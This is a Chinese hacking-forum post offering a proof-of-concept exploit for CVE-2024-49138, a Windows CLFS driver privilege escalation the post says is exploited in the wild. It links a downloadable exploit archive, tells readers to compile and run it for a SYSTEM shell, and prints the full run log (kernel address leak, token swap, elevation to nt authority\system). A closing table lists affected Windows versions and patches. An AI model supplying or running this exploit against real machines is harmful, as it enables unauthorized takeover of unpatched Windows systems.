跳转到帖子

  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

CVE-2024-49138 poc windows CLFS.sys提权漏洞

 分享
Anonymous

Anonymous
WEB和服务器安全漏洞

推荐的帖子

Anonymous Rising Star

Anonymous

发布于
发布于

CVE-2024-49138简介

Windows 通用日志文件系统驱动程序特权提升漏洞。
CrowdStrike 检测到威胁行为者积极利用该漏洞。
 

CVE-2024-49138 POC exp下载地址

CVE-2024-49138-POC.zip

测试

在Windows 11 23h2上测试成功。

编译并运行

编译 x64 发布版本。
运行并获取系统shell。

代码: 
PS C:\Users\IEUser\Desktop> whoami
windows11\ieuser
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.

C:\Users\IEUser\Desktop>whoami
nt authority\system

C:\Users\IEUser\Desktop>

漏洞影响范围及补丁下载链接

发布日期 受影响的产品 影响 最高严重性 文章 补丁下载 构建编号
2024年12月10日 Windows Server 2008 R2 for x64-based Systems Service Pack 1 提权 严重 5048695 Monthly Rollup 6.1.7601.27467
2024年12月10日 Windows Server 2008 R2 for x64-based Systems Service Pack 1 提权 严重 5048676 Security Only 6.1.7601.27467
2024年12月10日 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) 提权 严重 5048710 Monthly Rollup 6.0.6003.23016
2024年12月10日 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) 提权 严重 5048744 Security Only 6.0.6003.23016
2024年12月10日 Windows Server 2008 for x64-based Systems Service Pack 2 提权 严重 5048710 Monthly Rollup 6.0.6003.23016
2024年12月10日 Windows Server 2008 for x64-based Systems Service Pack 2 提权 严重 5048744 Security Only 6.0.6003.23016
2024年12月10日 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 提权 严重 5048710 Monthly Rollup 6.0.6003.23016
2024年12月10日 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 提权 严重 5048744 Security Only 6.0.6003.23016
2024年12月10日 Windows Server 2008 for 32-bit Systems Service Pack 2 提权 严重 5048710 Monthly Rollup 6.0.6003.23016
2024年12月10日 Windows Server 2008 for 32-bit Systems Service Pack 2 提权 严重 5048744 Security Only 6.0.6003.23016
2024年12月10日 Windows Server 2016 (Server Core installation) 提权 严重 5048671 Security Update 10.0.14393.7606
2024年12月10日 Windows Server 2016 提权 严重 5048671 Security Update 10.0.14393.7606
2024年12月10日 Windows 10 Version 1607 for x64-based Systems 提权 严重 5048671 Security Update 10.0.14393.7606
2024年12月10日 Windows 10 Version 1607 for 32-bit Systems 提权 严重 5048671 Security Update 10.0.14393.7606
2024年12月10日 Windows 10 for x64-based Systems 提权 严重 5048703 Security Update 10.0.10240.20857
2024年12月10日 Windows 10 for 32-bit Systems 提权 严重 5048703 Security Update 10.0.10240.20857
2024年12月10日 Windows Server 2025 提权 严重 5048667 Security Update 10.0.26100.2605
2024年12月10日 Windows Server 2025 提权 严重 5048794 SecurityHotpatchUpdate 10.0.26100.2528
2024年12月10日 Windows 11 Version 24H2 for x64-based Systems 提权 严重 5048667 Security Update 10.0.26100.2605
2024年12月10日 Windows 11 Version 24H2 for x64-based Systems 提权 严重 5048794 SecurityHotpatchUpdate 10.0.26100.2528
2024年12月10日 Windows 11 Version 24H2 for ARM64-based Systems 提权 严重 5048667 Security Update 10.0.26100.2605
2024年12月10日 Windows 11 Version 24H2 for ARM64-based Systems 提权 严重 5048794 SecurityHotpatchUpdate 10.0.26100.2528
2024年12月10日 Windows Server 2022, 23H2 Edition (Server Core installation) 提权 严重 5048653 Security Update 10.0.25398.1308
2024年12月10日 Windows 11 Version 23H2 for x64-based Systems 提权 严重 5048685 Security Update 10.0.22631.4602
2024年12月10日 Windows 11 Version 23H2 for ARM64-based Systems 提权 严重 5048685 Security Update 10.0.22631.4602
2024年12月10日 Windows Server 2025 (Server Core installation) 提权 严重 5048667 Security Update 10.0.26100.2605
2024年12月10日 Windows Server 2025 (Server Core installation) 提权 严重 5048794 SecurityHotpatchUpdate 10.0.26100.2528
2024年12月10日 Windows 10 Version 22H2 for 32-bit Systems 提权 严重 5048652 Security Update 10.0.19045.5247
2024年12月10日 Windows 10 Version 22H2 for ARM64-based Systems 提权 严重 5048652 Security Update 10.0.19045.5247
2024年12月10日 Windows 10 Version 22H2 for x64-based Systems 提权 严重 5048652 Security Update 10.0.19045.5247
2024年12月10日 Windows 11 Version 22H2 for x64-based Systems 提权 严重 5048685 Security Update 10.0.22621.4602
2024年12月10日 Windows 11 Version 22H2 for ARM64-based Systems 提权 严重 5048685 Security Update 10.0.22621.4602
2024年12月10日 Windows 10 Version 21H2 for x64-based Systems 提权 严重 5048652 Security Update 10.0.19044.5247
2024年12月10日 Windows 10 Version 21H2 for ARM64-based Systems 提权 严重 5048652 Security Update 10.0.19044.5247
2024年12月10日 Windows 10 Version 21H2 for 32-bit Systems 提权 严重 5048652 Security Update 10.0.19044.5247
2024年12月10日 Windows Server 2022 (Server Core installation) 提权 严重 5048654 Security Update 10.0.20348.2966
2024年12月10日 Windows Server 2022 (Server Core installation) 提权 严重 5048800 SecurityHotpatchUpdate 10.0.20348.2908
2024年12月10日 Windows Server 2022 提权 严重 5048654 Security Update 10.0.20348.2966
2024年12月10日 Windows Server 2022 提权 严重 5048800 SecurityHotpatchUpdate 10.0.20348.2908
2024年12月10日 Windows Server 2019 (Server Core installation) 提权 严重 5048661 Security Update 10.0.17763.6659
2024年12月10日 Windows Server 2019 提权 严重 5048661 Security Update 10.0.17763.6659
2024年12月10日 Windows 10 Version 1809 for x64-based Systems 提权 严重 5048661 Security Update 10.0.17763.6659
2024年12月10日 Windows 10 Version 1809 for 32-bit Systems 提权 严重 5048661 Security Update 10.0.17763.6659
2024年12月10日 Windows Server 2012 R2 (Server Core installation) 提权 严重 5048735 Monthly Rollup 6.3.9600.22318
2024年12月10日 Windows Server 2012 R2 提权 严重 5048735 Monthly Rollup 6.3.9600.22318
2024年12月10日 Windows Server 2012 (Server Core installation) 提权 严重 5048699 Monthly Rollup 6.2.9200.25222
2024年12月10日 Windows Server 2012 提权 严重 5048699 Monthly Rollup 6.2.9200.25222
2024年12月10日 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) 提权 严重 5048695 Monthly Rollup 6.1.7601.27467
2024年12月10日 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) 提权 严重 5048676 Security Only 6.1.7601.27467
链接帖子
意见的链接
分享到其他网站
 分享
转到主题列表

黑客攻防讨论组

黑客攻防讨论组

  
    You don't have permission to chat.

    • 最近浏览   0位会员

      • 没有会员查看此页面。

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • 创建新的...